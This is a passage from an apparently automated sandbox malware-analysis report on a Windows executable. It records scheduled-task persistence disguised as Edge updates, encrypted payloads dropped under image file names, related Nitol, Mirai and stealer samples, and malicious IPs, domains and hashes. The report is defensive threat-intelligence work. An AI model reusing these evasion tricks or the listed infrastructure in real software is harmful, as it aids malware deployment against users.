                            Number of analysed new started processes analysed:55
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Sample name:183643586-388657435.07.exe
                            Detection:MAL
                            Classification:mal100.evad.winEXE@76/21@82/4
                            EGA Information:
                            • Successful, ratio: 60%
                            HCA Information:
                            • Successful, ratio: 81%
                            • Number of executed functions: 16
                            • Number of non-executed functions: 137
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                            Warnings

                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Excluded IPs from analysis (whitelisted): 20.190.190.195
                            • Excluded domains from analysis (whitelisted): login.live.com, clients.config.office.net
                            • Execution Graph export aborted for target DXESuT.exe, PID 2236 because there are no executed function
                            • Execution Graph export aborted for target ieiUC1.exe, PID 1836 because there are no executed function
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            05:11:19Task SchedulerRun new task: cMjXa path: C:\Users\user\Documents\ieiUC1.exe
                            05:12:52Task SchedulerRun new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 EGTXu path: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe
                            05:12:52Task SchedulerRun new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 TqxVm path: C:\Program Files (x86)\DXESuT\DXESuT.exe
                            05:16:08Task SchedulerRun new task: With Organize Our Automation Intelligent path: dTuXOGtw.exe
                            05:18:11Task SchedulerRun new task: Goals Seamlessly Capabilities path: Qns7it2C.exe
                            05:18:15Task SchedulerRun new task: Analysis Optimize Smooth Powerful Efficiently path: pQfOyRt7.exe s>1776
                            23:12:45API Interceptor89406x Sleep call for process: ieiUC1.exe modified
                            23:13:24API Interceptor11939712x Sleep call for process: DXESuT.exe modified
                            23:16:44API Interceptor177541x Sleep call for process: dTuXOGtw.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            118.178.60.9149876985-734579485.05.exeGet hashmaliciousNitolBrowse
                              13478674376-78423498.01.exeGet hashmaliciousUnknownBrowse
                                1387457-38765948.15.exeGet hashmaliciousNitolBrowse
                                  2976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                                    2976587-987347589.08.exeGet hashmaliciousNitolBrowse
                                      2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                        2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                          2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                                            e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                                              23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                                                118.178.60.1032976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                                                  2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com2976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                                                    • 118.178.60.103
                                                    2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                    • 118.178.60.103
                                                    sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com149876985-734579485.05.exeGet hashmaliciousNitolBrowse
                                                    • 118.178.60.9
                                                    149876985-734579485.05.exeGet hashmaliciousUnknownBrowse
                                                    • 118.178.60.9
                                                    13478674376-78423498.01.exeGet hashmaliciousUnknownBrowse
                                                    • 118.178.60.9
                                                    1387457-38765948.15.exeGet hashmaliciousNitolBrowse
                                                    • 118.178.60.9
                                                    2976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                                                    • 118.178.60.9
                                                    2976587-987347589.08.exeGet hashmaliciousNitolBrowse
                                                    • 118.178.60.9
                                                    2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                    • 118.178.60.9
                                                    2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                    • 118.178.60.9
                                                    2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                                                    • 118.178.60.9
                                                    e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                                                    • 118.178.60.9

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd149876985-734579485.05.exeGet hashmaliciousNitolBrowse
                                                    • 118.178.60.9
                                                    149876985-734579485.05.exeGet hashmaliciousUnknownBrowse
                                                    • 59.110.190.21
                                                    elitebotnet.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 106.14.74.100
                                                    trow.exeGet hashmaliciousUnknownBrowse
                                                    • 39.99.233.155
                                                    13478674376-78423498.01.exeGet hashmaliciousUnknownBrowse
                                                    • 47.101.28.195
                                                    3.elfGet hashmaliciousUnknownBrowse
                                                    • 8.156.156.245
                                                    i686.elfGet hashmaliciousMiraiBrowse
                                                    • 47.104.110.148
                                                    res.ppc.elfGet hashmaliciousUnknownBrowse
                                                    • 47.114.43.16
                                                    res.mpsl.elfGet hashmaliciousUnknownBrowse
                                                    • 8.187.66.138
                                                    6.elfGet hashmaliciousUnknownBrowse
                                                    • 8.130.209.218
                                                    CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd149876985-734579485.05.exeGet hashmaliciousNitolBrowse
                                                    • 118.178.60.9
                                                    149876985-734579485.05.exeGet hashmaliciousUnknownBrowse
                                                    • 59.110.190.21
                                                    elitebotnet.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 106.14.74.100
                                                    trow.exeGet hashmaliciousUnknownBrowse
                                                    • 39.99.233.155
                                                    13478674376-78423498.01.exeGet hashmaliciousUnknownBrowse
                                                    • 47.101.28.195
                                                    3.elfGet hashmaliciousUnknownBrowse
                                                    • 8.156.156.245
                                                    i686.elfGet hashmaliciousMiraiBrowse
                                                    • 47.104.110.148
                                                    res.ppc.elfGet hashmaliciousUnknownBrowse
                                                    • 47.114.43.16
                                                    res.mpsl.elfGet hashmaliciousUnknownBrowse
                                                    • 8.187.66.138
                                                    6.elfGet hashmaliciousUnknownBrowse
                                                    • 8.130.209.218
                                                    CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd149876985-734579485.05.exeGet hashmaliciousNitolBrowse
                                                    • 118.178.60.9
                                                    149876985-734579485.05.exeGet hashmaliciousUnknownBrowse
                                                    • 59.110.190.21
                                                    elitebotnet.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 106.14.74.100
                                                    trow.exeGet hashmaliciousUnknownBrowse
                                                    • 39.99.233.155
                                                    13478674376-78423498.01.exeGet hashmaliciousUnknownBrowse
                                                    • 47.101.28.195
                                                    3.elfGet hashmaliciousUnknownBrowse
                                                    • 8.156.156.245
                                                    i686.elfGet hashmaliciousMiraiBrowse
                                                    • 47.104.110.148
                                                    res.ppc.elfGet hashmaliciousUnknownBrowse
                                                    • 47.114.43.16
                                                    res.mpsl.elfGet hashmaliciousUnknownBrowse
                                                    • 8.187.66.138
                                                    6.elfGet hashmaliciousUnknownBrowse
                                                    • 8.130.209.218
                                                    CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdChttps://offfryfjtht767755433.webflow.io/Get hashmaliciousUnknownBrowse
                                                    • 47.253.61.56
                                                    149876985-734579485.05.exeGet hashmaliciousNitolBrowse
                                                    • 8.210.209.78
                                                    elitebotnet.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 8.209.8.36
                                                    https://bnbswap.lakshmi.trading/Get hashmaliciousUnknownBrowse
                                                    • 8.212.49.60
                                                    https://hmflowcontrols.com/ch/CHFINAL/50477/Get hashmaliciousUnknownBrowse
                                                    • 8.222.203.130
                                                    3.elfGet hashmaliciousUnknownBrowse
                                                    • 47.88.121.129
                                                    5.elfGet hashmaliciousUnknownBrowse
                                                    • 8.220.246.3
                                                    3.elfGet hashmaliciousUnknownBrowse
                                                    • 149.129.63.242
                                                    1387457-38765948.15.exeGet hashmaliciousNitolBrowse
                                                    • 8.210.64.208
                                                    http://www.k03g.xyz/Get hashmaliciousUnknownBrowse
                                                    • 47.254.186.224

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    a0e9f5d64349fb13191bc781f81f42e1uo9m.exeGet hashmaliciousLummaCBrowse
                                                    • 39.103.20.17
                                                    uo9m.exeGet hashmaliciousLummaCBrowse
                                                    • 39.103.20.17
                                                    YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                                                    • 39.103.20.17
                                                    msit.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 39.103.20.17
                                                    tesr.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 39.103.20.17
                                                    WSLRT.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 39.103.20.17
                                                    msit.msiGet hashmaliciousLummaC StealerBrowse
                                                    • 39.103.20.17
                                                    PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSMGet hashmaliciousUnknownBrowse
                                                    • 39.103.20.17
                                                    37f463bf4616ecd445d4a1937da06e19Handler.exeGet hashmaliciousDanaBot, VidarBrowse
                                                    • 118.178.60.103
                                                    • 118.178.60.9
                                                    sysadmin.exeGet hashmaliciousVidarBrowse
                                                    • 118.178.60.103
                                                    • 118.178.60.9
                                                    JUbmpeT.exeGet hashmaliciousVidarBrowse
                                                    • 118.178.60.103
                                                    • 118.178.60.9
                                                    149876985-734579485.05.exeGet hashmaliciousNitolBrowse
                                                    • 118.178.60.103
                                                    • 118.178.60.9
                                                    149876985-734579485.05.exeGet hashmaliciousUnknownBrowse
                                                    • 118.178.60.103
                                                    • 118.178.60.9
                                                    YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                                                    • 118.178.60.103
                                                    • 118.178.60.9
                                                    PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSMGet hashmaliciousUnknownBrowse
                                                    • 118.178.60.103
                                                    • 118.178.60.9
                                                    PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSMGet hashmaliciousUnknownBrowse
                                                    • 118.178.60.103
                                                    • 118.178.60.9
                                                    13478674376-78423498.01.exeGet hashmaliciousUnknownBrowse
                                                    • 118.178.60.103
                                                    • 118.178.60.9

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe149876985-734579485.05.exeGet hashmaliciousNitolBrowse
                                                      13478674376-78423498.01.exeGet hashmaliciousUnknownBrowse
                                                        1387457-38765948.15.exeGet hashmaliciousNitolBrowse
                                                          2976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                                                            2976587-987347589.08.exeGet hashmaliciousNitolBrowse
                                                              2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                                2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                                  2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                                                                    e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                                                                      23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse

                                                                        Created / dropped Files

                                                                        C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\DXESuT\DXESuT.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):54152
                                                                        Entropy (8bit):6.64786972992462
                                                                        Encrypted:false
                                                                        SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                                        MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                        SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                                        SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                                        SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Joe Sandbox View:
                                                                        • Filename: 149876985-734579485.05.exe, Detection: malicious, Browse
                                                                        • Filename: 13478674376-78423498.01.exe, Detection: malicious, Browse
                                                                        • Filename: 1387457-38765948.15.exe, Detection: malicious, Browse
                                                                        • Filename: 2976587-987347589.07.exe, Detection: malicious, Browse
                                                                        • Filename: 2976587-987347589.08.exe, Detection: malicious, Browse
                                                                        • Filename: 2873466535874-68348745.02.exe, Detection: malicious, Browse
                                                                        • Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse
                                                                        • Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse
                                                                        • Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse
                                                                        • Filename: 23567791246-764698008.02.exe, Detection: malicious, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Program Files (x86)\6IAs1K1O\log.src

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\DXESuT\DXESuT.exe
                                                                        File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):5059989
                                                                        Entropy (8bit):7.999955228033335
                                                                        Encrypted:true
                                                                        SSDEEP:98304:xOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:Yo6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                                        MD5:CA42A76FC373CF8AAA1ADC54FACF1CAD
                                                                        SHA1:CE3F60A04B9851E886F4589422E3E1603CB92259
                                                                        SHA-256:8DB2FDEDE3D077A15FD1EF7F0B5F73D6CF92A0F99953F85FC8D60ED83F5E724C
                                                                        SHA-512:0CBB87694351E818B79D5C52BAEE4D945328273B8AC0E72D3C9479DAA92AA7F2FE8277CFD86F2184A4ACF80A00CCCAC8B84116A4122710BB1633D0EB028A6C9B
                                                                        Malicious:false
                                                                        Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q.....q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                        C:\Program Files (x86)\6IAs1K1O\tbcore3U.dll

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\DXESuT\DXESuT.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):4858192
                                                                        Entropy (8bit):7.9925165642940526
                                                                        Encrypted:true
                                                                        SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/I:9S4+O6P5OeMRrjRy7aPZbm3k8V/I
                                                                        MD5:E3F069246662572855287449257C3509
                                                                        SHA1:3C3B0F86C6572B4E8C782C6861F7688D62CBC70D
                                                                        SHA-256:EBA09A20635026E420E566B75D531956E1CCE26E6C36B50418FFD04D098C599E
                                                                        SHA-512:A62BE9E49EA4E9662E0430D7EB84129C053EB5B24C05867001548B82D842B1469B85C4043ABB5576444C0B07E6DA9B0C75D55BD98A3F2104F994916AED8C44BB
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

                                                                        C:\Program Files (x86)\6IAs1K1O\utils.vcxproj

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\DXESuT\DXESuT.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                        Category:dropped
                                                                        Size (bytes):365477
                                                                        Entropy (8bit):7.9993993752174
                                                                        Encrypted:true
                                                                        SSDEEP:6144:miACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:p8u69CghoQxoMTFQqtKFCG7mbZ
                                                                        MD5:966ACFD1DBEFE013EAEE154527DCF923
                                                                        SHA1:1B15670FB17975AE9C7DD827BB4E6BDCCC1C8DDD
                                                                        SHA-256:A7A45E043D15CD026D990E909181A0AA9FB4A48935F81087B4D10E2F31AD58E9
                                                                        SHA-512:8527A6B61BAB7BF1BCDE9E7FD8D07605343EBBA75D45ECE643CC5CEDC6976167EC8CCA74ED6FE19A6FAE67BC0E0A0E0D8A901A7D22D6FAC6B48B88B7782983E6
                                                                        Malicious:false
                                                                        Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..fa."q.2....#B...R..$3br........%&'()*456789:CDEF8.217.78.242....."ijstuvwxyz....vqxvll.net......3#..............78.242....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                                        C:\Program Files (x86)\DXESuT\DXESuT.exe

                                                                        Download File
                                                                        Process:C:\Users\user\Documents\ieiUC1.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):54152
                                                                        Entropy (8bit):6.64786972992462
                                                                        Encrypted:false
                                                                        SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                                        MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                        SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                                        SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                                        SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Program Files (x86)\DXESuT\log.src

                                                                        Download File
                                                                        Process:C:\Users\user\Documents\ieiUC1.exe
                                                                        File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):5059989
                                                                        Entropy (8bit):7.999955224987405
                                                                        Encrypted:true
                                                                        SSDEEP:98304:DOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:2o6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                                        MD5:A47EFD6BB628C3597C7B2064FD5A5BD2
                                                                        SHA1:C9B5147E5D79D2704142D4F3510CC77C8A352BB7
                                                                        SHA-256:7AD12C095184E4C31B8C0D64FE914C5622CF14B7EA3FD064E8354C4006ABAC64
                                                                        SHA-512:14A3D538DAF252F391FB023C88429C2A213B042BB49A93E11B88DBA34672AEDA4A60137616D881432A8D86664E369A3876C43FFF628D1AFD65AE03C12E98A1AC
                                                                        Malicious:false
                                                                        Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                        C:\Program Files (x86)\DXESuT\tbcore3U.dll

                                                                        Download File
                                                                        Process:C:\Users\user\Documents\ieiUC1.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):4858192
                                                                        Entropy (8bit):7.992517250145775
                                                                        Encrypted:true
                                                                        SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/V:9S4+O6P5OeMRrjRy7aPZbm3k8V/V
                                                                        MD5:C6855D0BE2C64F334CCD05F08DEB8B97
                                                                        SHA1:8264D93B968619C0835E238DDA91F2A794936A1B
                                                                        SHA-256:6CE5E1E665A30785705CE0F0310DCE96D71856969C2794FC519CC4A901E7733D
                                                                        SHA-512:10E9E724D15BD45F4A075402E2166128F143405BEBDAF265F91DA7DE1FD527A4B5ED8ABB23A72D881E62C54F4868A3012EC21038DEE2067EB9AECD8C745B22BA
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

                                                                        C:\Program Files (x86)\DXESuT\utils.vcxproj

                                                                        Download File
                                                                        Process:C:\Users\user\Documents\ieiUC1.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                        Category:dropped
                                                                        Size (bytes):365477
                                                                        Entropy (8bit):7.999399461651082
                                                                        Encrypted:true
                                                                        SSDEEP:6144:niACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:i8u69CghoQxoMTFQqtKFCG7mbZ
                                                                        MD5:FD51D1A6A98ED2678FFEF614DA8481FB
                                                                        SHA1:51A8CC4A616C06FE2A440339E501C2F09635A393
                                                                        SHA-256:4CA089B91DF8E8AADA1CD9420875D39F7FE736896FA560E2A6F368FEB1BD5FC0
                                                                        SHA-512:BBFE412212516CFC00D01F7D8620DD65B4807A3251420A01995C3BBA6702B5B6C2E327009C9FF12F07559B4254E36C91DEA987200F10025EA09B92987913B660
                                                                        Malicious:false
                                                                        Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..fa."q.2....#B...R..$3br........%&'()*456789:CDEF8.217.78.242....."ijstuvwxyz....vqxvll.net......3#..............78.242....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\FOM-51[1].jpg

                                                                        Download File
                                                                        Process:C:\Users\user\Documents\ieiUC1.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                        Category:dropped
                                                                        Size (bytes):4859125
                                                                        Entropy (8bit):7.999956261017207
                                                                        Encrypted:true
                                                                        SSDEEP:98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
                                                                        MD5:EE6CA3EEA7F9B1C81059AEF570A28C02
                                                                        SHA1:14EFBF498356644D9B1327407E3F03E1BFBEA363
                                                                        SHA-256:A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
                                                                        SHA-512:563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
                                                                        Malicious:false
                                                                        Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\FOM-50[1].jpg

                                                                        Download File
                                                                        Process:C:\Users\user\Documents\ieiUC1.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                        Category:dropped
                                                                        Size (bytes):55085
